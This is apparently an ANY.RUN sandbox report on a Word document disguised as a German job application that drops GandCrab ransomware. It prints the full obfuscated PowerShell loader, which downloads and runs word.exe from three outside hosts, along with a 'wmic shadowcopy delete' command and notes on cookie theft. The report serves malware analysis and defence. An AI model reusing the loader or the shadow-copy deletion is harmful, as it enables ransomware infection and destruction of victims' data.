General Info

File name

Britta_Hollermann_Bewerbungsunterlagen.doc

Full analysis
https://app.any.run/tasks/869f7d86-c330-4d66-bbd2-2da4485b172c
Verdict
Malicious activity
Analysis date
3/14/2019, 12:11:13
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

generated-doc

opendir

loader

ransomware

gandcrab

Indicators:

MIME:
application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info:
Microsoft Word 2007+
MD5

1b737b8b7ce22967d2d4cdedf7dc210d

SHA1

daf8c25d857fbc6e4d9d9b205c98338d54679485

SHA256

dd27b85624cac5b98f2670e1636c0b1787ecb088126d072f58dfb67c76d0fd09

SSDEEP

1536:Wq+PpgnKZXGdythQh/zkq9D4aqFrvlUmz8qtBvNL:1+Da37kq9zqYVqtBvNL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Executes PowerShell scripts
  • cmd.exe (PID: 2652)
Application was dropped or rewritten from another process
  • 6.exe (PID: 2456)
Deletes shadow copies
  • 6.exe (PID: 2456)
Renames files like Ransomware
  • 6.exe (PID: 2456)
Writes file to Word startup folder
  • 6.exe (PID: 2456)
Downloads executable files from the Internet
  • powershell.exe (PID: 3284)
Starts CMD.EXE for commands execution
  • WINWORD.EXE (PID: 3496)
Dropped file may contain instructions of ransomware
  • 6.exe (PID: 2456)
Unusual execution from Microsoft Office
  • WINWORD.EXE (PID: 3496)
Actions looks like stealing of personal data
  • 6.exe (PID: 2456)
GANDCRAB detected
  • 6.exe (PID: 2456)
Creates files in the Windows directory
  • powershell.exe (PID: 3284)
Creates files in the user directory
  • powershell.exe (PID: 3284)
  • 6.exe (PID: 2456)
Reads Internet Cache Settings
  • 6.exe (PID: 2456)
Reads the cookies of Mozilla Firefox
  • 6.exe (PID: 2456)
Creates files in the program directory
  • 6.exe (PID: 2456)
Executable content was dropped or overwritten
  • powershell.exe (PID: 3284)
Removes files from Windows directory
  • powershell.exe (PID: 3284)
Creates files in the user directory
  • WINWORD.EXE (PID: 3496)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 3496)
Dropped object may contain TOR URL's
  • 6.exe (PID: 2456)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.docm
|   Word Microsoft Office Open XML Format document (with Macro) (53.6%)
.docx
|   Word Microsoft Office Open XML Format document (24.2%)
.zip
|   Open Packaging Conventions container (18%)
.zip
|   ZIP compressed archive (4.1%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
0x0006
ZipCompression:
Deflated
ZipModifyDate:
1980:01:01 00:00:00
ZipCRC:
0x7df6b578
ZipCompressedSize:
427
ZipUncompressedSize:
1637
ZipFileName:
[Content_Types].xml
XML
Template:
Normal.dotm
TotalEditTime:
null
Pages:
1
Words:
null
Characters:
1
Application:
Microsoft Office Word
DocSecurity:
None
Lines:
1
Paragraphs:
1
ScaleCrop:
No
HeadingPairs
null
null
TitlesOfParts:
null
Company:
null
LinksUpToDate:
No
CharactersWithSpaces:
1
SharedDoc:
No
HyperlinksChanged:
No
AppVersion:
16
Keywords:
null
LastModifiedBy:
Admin
RevisionNumber:
4
CreateDate:
2019:03:13 14:16:00Z
ModifyDate:
2019:03:13 15:23:00Z
XMP
Title:
null
Subject:
null
Creator:
admin
Description:
null

Screenshots

Processes

Total processes
42
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

+
start download and start winword.exe no specs cmd.exe no specs powershell.exe #GANDCRAB 6.exe wmic.exe vssvc.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3496
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Britta_Hollermann_Bewerbungsunterlagen.doc.docm"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\fm20.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\fm20enu.dll
c:\windows\system32\winmm.dll
c:\windows\system32\windowscodecsext.dll
c:\windows\system32\mscms.dll
c:\windows\system32\userenv.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\prntvpt.dll
c:\program files\microsoft office\office14\msproof7.dll

PID
2652
CMD
c:\windows\system32\cmd /c set p=power&& set s=shell&& call %p%%s% $TpTHwrjVG = '$Xt6IXVHy = new-obj-658393886-16253271700ect -com-658393886-16253271700obj-658393886-16253271700ect wsc-658393886-16253271700ript.she-658393886-16253271700ll;$XdNivabeu = new-object sys-658393886-16253271700tem.net.web-658393886-16253271700client;$JgUosZV = new-object random;$aSBDE = \"-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://nagiah.website/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilecontractoffers.co.uk/public/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilessavingdeals.co.uk/database/word.exe\".spl-658393886-16253271700it(\",\");$o4jRc2Yx = $JgUosZV.nex-658393886-16253271700t(1, 65536);$V8GNV = \"c:\win-658393886-16253271700dows\tem-658393886-16253271700p\6.ex-658393886-16253271700e\";for-658393886-16253271700each($rWx2E in $aSBDE){try{$XdNivabeu.dow-658393886-16253271700nlo-658393886-16253271700adf-658393886-16253271700ile($rWx2E.ToS-658393886-16253271700tring(), $V8GNV);sta-658393886-16253271700rt-pro-658393886-16253271700cess $V8GNV;break;}catch{}}'.replace('-658393886-16253271700', $kDVZR);$adVuZW = '';iex($TpTHwrjVG);
Path
c:\windows\system32\cmd.exe
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3284
CMD
powershell $TpTHwrjVG = '$Xt6IXVHy = new-obj-658393886-16253271700ect -com-658393886-16253271700obj-658393886-16253271700ect wsc-658393886-16253271700ript.she-658393886-16253271700ll;$XdNivabeu = new-object sys-658393886-16253271700tem.net.web-658393886-16253271700client;$JgUosZV = new-object random;$aSBDE = \"-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://nagiah.website/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilecontractoffers.co.uk/public/word.exe,-658393886-16253271700h-658393886-16253271700t-658393886-16253271700t-658393886-16253271700p-658393886-16253271700://mobilessavingdeals.co.uk/database/word.exe\".spl-658393886-16253271700it(\",\");$o4jRc2Yx = $JgUosZV.nex-658393886-16253271700t(1, 65536);$V8GNV = \"c:\win-658393886-16253271700dows\tem-658393886-16253271700p\6.ex-658393886-16253271700e\";for-658393886-16253271700each($rWx2E in $aSBDE){try{$XdNivabeu.dow-658393886-16253271700nlo-658393886-16253271700adf-658393886-16253271700ile($rWx2E.ToS-658393886-16253271700tring(), $V8GNV);sta-658393886-16253271700rt-pro-658393886-16253271700cess $V8GNV;break;}catch{}}'.replace('-658393886-16253271700', $kDVZR);$adVuZW = '';iex($TpTHwrjVG);
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\sxs.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\temp\6.exe
c:\windows\system32\netutils.dll

PID
2456
CMD
"C:\windows\temp\6.exe"
Path
C:\windows\temp\6.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
djsoft.net (c) 2003-2015
Description
Nullable Arsenals Identifier Addpackage
Version
Modules
Image
c:\windows\temp\6.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winspool.drv
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\avifil32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\msacm32.dll
c:\windows\system32\msvfw32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\opengl32.dll
c:\windows\system32\glu32.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\credssp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ntkrnlpa.exe
c:\windows\system32\kbdus.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll

PID
3524
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
Parent process
6.exe
User
SYSTEM
Integrity Level
SYSTEM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
3544
CMD
C:\Windows\system32\vssvc.exe
Path
C:\Windows\system32\vssvc.exe
Indicators
No indicators
Parent process
––
User
SYSTEM
Integrity Level
SYSTEM
Version:
Company
Microsoft Corporation
Description
Microsoft® Volume Shadow Copy Service
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\vssvc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\atl.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\vssapi.dll
c:\windows\system32\vsstrace.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\clusapi.dll
c:\windows\system32\cryptdll.dll
c:\windows\system32\xolehlp.dll
c:\windows\system32\version.dll
c:\windows\system32\resutils.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\authz.dll
c:\windows\system32\virtdisk.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vss_ps.dll
c:\windows\system32\samlib.dll
c:\windows\system32\es.dll
c:\windows\system32\propsys.dll
c:\windows\system32\catsrvut.dll
c:\windows\system32\mfcsubs.dll

Registry activity

Total events
1759
Read events
1018
Write events
740
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
3496
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
-*(
2D2A2800A80D0000010000000000000000000000
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1315831829
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831948
3496
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831949
3496
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
